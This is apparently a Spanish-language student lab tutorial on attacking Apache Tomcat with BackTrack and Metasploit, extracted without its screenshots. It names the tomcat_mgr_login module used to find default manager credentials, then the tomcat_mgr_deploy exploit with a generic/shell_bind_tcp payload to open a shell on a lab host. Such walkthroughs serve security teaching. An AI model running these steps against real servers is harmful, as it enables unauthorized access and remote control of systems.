Está en la página 1de 10

HACKING APACHE TOMCAT CON BACKTRACK escanear red para el equipo vulnerable Una vez obteniendo la IP victima procedemos

a realizar un escaneo. Abrimos una consola con msfconsole En mi caso mi direccin IP victima es 192.168.1.89

Podemos realizar un escaneo mas profundo para obtener las versiones de nuestra IP victima.

Resultado del escaneo,observamos la versin de apache tomcat.

G. NAYELI JIMENEZ BAUTISTA

Desde una nueva consola ejecutamos lo siguiente: navegador, IP y el puerto por defecto de apache tomcat

Y como podemos ver la pagina de apache tomcat

G. NAYELI JIMENEZ BAUTISTA

Desde la pestaa de tomcat Administration podemos entrar al sitio solo necesitamos el login y contrasea que procederemos a hackear.

Buscamos vulnerabilidades y ejecutamos el siguiente comando G. NAYELI JIMENEZ BAUTISTA

search tomcat

Utilizaremos la slguiente opcin: use auxiliary/scanner/http/tomcat_mgr_login

G. NAYELI JIMENEZ BAUTISTA

show options

Tecleamos los siguientes comandos el IP de la victima y cambiamos el puerto

Realizamos un show options para ver si se cambio el puerto Luego enviamos el exploit

G. NAYELI JIMENEZ BAUTISTA

G. NAYELI JIMENEZ BAUTISTA

En el exploit me dice que es el usuario tomcat y password tomcat

Ya tenemos acceso al sitio.

G. NAYELI JIMENEZ BAUTISTA

Podemos buscar otras opciones

Ahora utilizaremos el siguiente exploit: use exploit/multi/http/tomcat_mgr_deploy

Doy show options

G. NAYELI JIMENEZ BAUTISTA

Decimos cual es el password y contrasea,IP y buscamos opciones

Ejecutamos show payloads

G. NAYELI JIMENEZ BAUTISTA

El que utilizaremos sera: set payload generic/shell_bind_tcp despus buscaremos vulnerabilidades con: show options y enviamos el exploit.

G. NAYELI JIMENEZ BAUTISTA

También podría gustarte

  • Tiki Wiki
    Tiki Wiki
    Documento6 páginas
    Tiki Wiki
    Nely Jimnz B
    Aún no hay calificaciones
  • Logs Del Sistema
    Logs Del Sistema
    Documento4 páginas
    Logs Del Sistema
    Nely Jimnz B
    Aún no hay calificaciones
  • Web Cruiser
    Web Cruiser
    Documento9 páginas
    Web Cruiser
    Nely Jimnz B
    Aún no hay calificaciones
  • Tarea
    Tarea
    Documento9 páginas
    Tarea
    Nely Jimnz B
    Aún no hay calificaciones
  • Manual de SSH
    Manual de SSH
    Documento5 páginas
    Manual de SSH
    Nely Jimnz B
    Aún no hay calificaciones
  • TAREA1
    TAREA1
    Documento4 páginas
    TAREA1
    Nely Jimnz B
    Aún no hay calificaciones
  • Scaneo de Puertos
    Scaneo de Puertos
    Documento9 páginas
    Scaneo de Puertos
    Nely Jimnz B
    Aún no hay calificaciones
  • Web Cruiser
    Web Cruiser
    Documento9 páginas
    Web Cruiser
    Nely Jimnz B
    Aún no hay calificaciones
  • Pag Wix
    Pag Wix
    Documento3 páginas
    Pag Wix
    Nely Jimnz B
    Aún no hay calificaciones
  • Puertos
    Puertos
    Documento15 páginas
    Puertos
    Nely Jimnz B
    Aún no hay calificaciones
  • Manual de SSH
    Manual de SSH
    Documento5 páginas
    Manual de SSH
    Nely Jimnz B
    Aún no hay calificaciones
  • Alojamiento de Una Pagina Web
    Alojamiento de Una Pagina Web
    Documento4 páginas
    Alojamiento de Una Pagina Web
    Nely Jimnz B
    Aún no hay calificaciones
  • Resume N
    Resume N
    Documento29 páginas
    Resume N
    Nely Jimnz B
    Aún no hay calificaciones
  • Unidad 2
    Unidad 2
    Documento12 páginas
    Unidad 2
    Nely Jimnz B
    Aún no hay calificaciones
  • PRÁCTICAS
    PRÁCTICAS
    Documento12 páginas
    PRÁCTICAS
    Nely Jimnz B
    Aún no hay calificaciones
  • Unidad 3
    Unidad 3
    Documento20 páginas
    Unidad 3
    Nely Jimnz B
    Aún no hay calificaciones
  • Instalacion de IIS, AD Y DS
    Instalacion de IIS, AD Y DS
    Documento18 páginas
    Instalacion de IIS, AD Y DS
    Nely Jimnz B
    Aún no hay calificaciones
  • Test de Penetraciòn
    Test de Penetraciòn
    Documento3 páginas
    Test de Penetraciòn
    Nely Jimnz B
    Aún no hay calificaciones
  • Sistemas de Negocios
    Sistemas de Negocios
    Documento3 páginas
    Sistemas de Negocios
    Nely Jimnz B
    Aún no hay calificaciones
  • Wire Shark
    Wire Shark
    Documento16 páginas
    Wire Shark
    Nely Jimnz B
    Aún no hay calificaciones
  • Test de Penetraciòn
    Test de Penetraciòn
    Documento3 páginas
    Test de Penetraciòn
    Nely Jimnz B
    Aún no hay calificaciones
  • End Point
    End Point
    Documento2 páginas
    End Point
    Nely Jimnz B
    Aún no hay calificaciones
  • Linux
    Linux
    Documento14 páginas
    Linux
    Nely Jimnz B
    Aún no hay calificaciones
  • Linux
    Linux
    Documento14 páginas
    Linux
    Nely Jimnz B
    Aún no hay calificaciones
  • Interrupcione - Sistemas Operativos
    Interrupcione - Sistemas Operativos
    Documento7 páginas
    Interrupcione - Sistemas Operativos
    Nely Jimnz B
    Aún no hay calificaciones
  • Unidad 1 Sistemas Operativos
    Unidad 1 Sistemas Operativos
    Documento12 páginas
    Unidad 1 Sistemas Operativos
    Nely Jimnz B
    Aún no hay calificaciones
  • Manual para La Instalacion de Debian
    Manual para La Instalacion de Debian
    Documento32 páginas
    Manual para La Instalacion de Debian
    Nely Jimnz B
    Aún no hay calificaciones
  • Codigos de La Pagina Anclada
    Codigos de La Pagina Anclada
    Documento3 páginas
    Codigos de La Pagina Anclada
    Nely Jimnz B
    Aún no hay calificaciones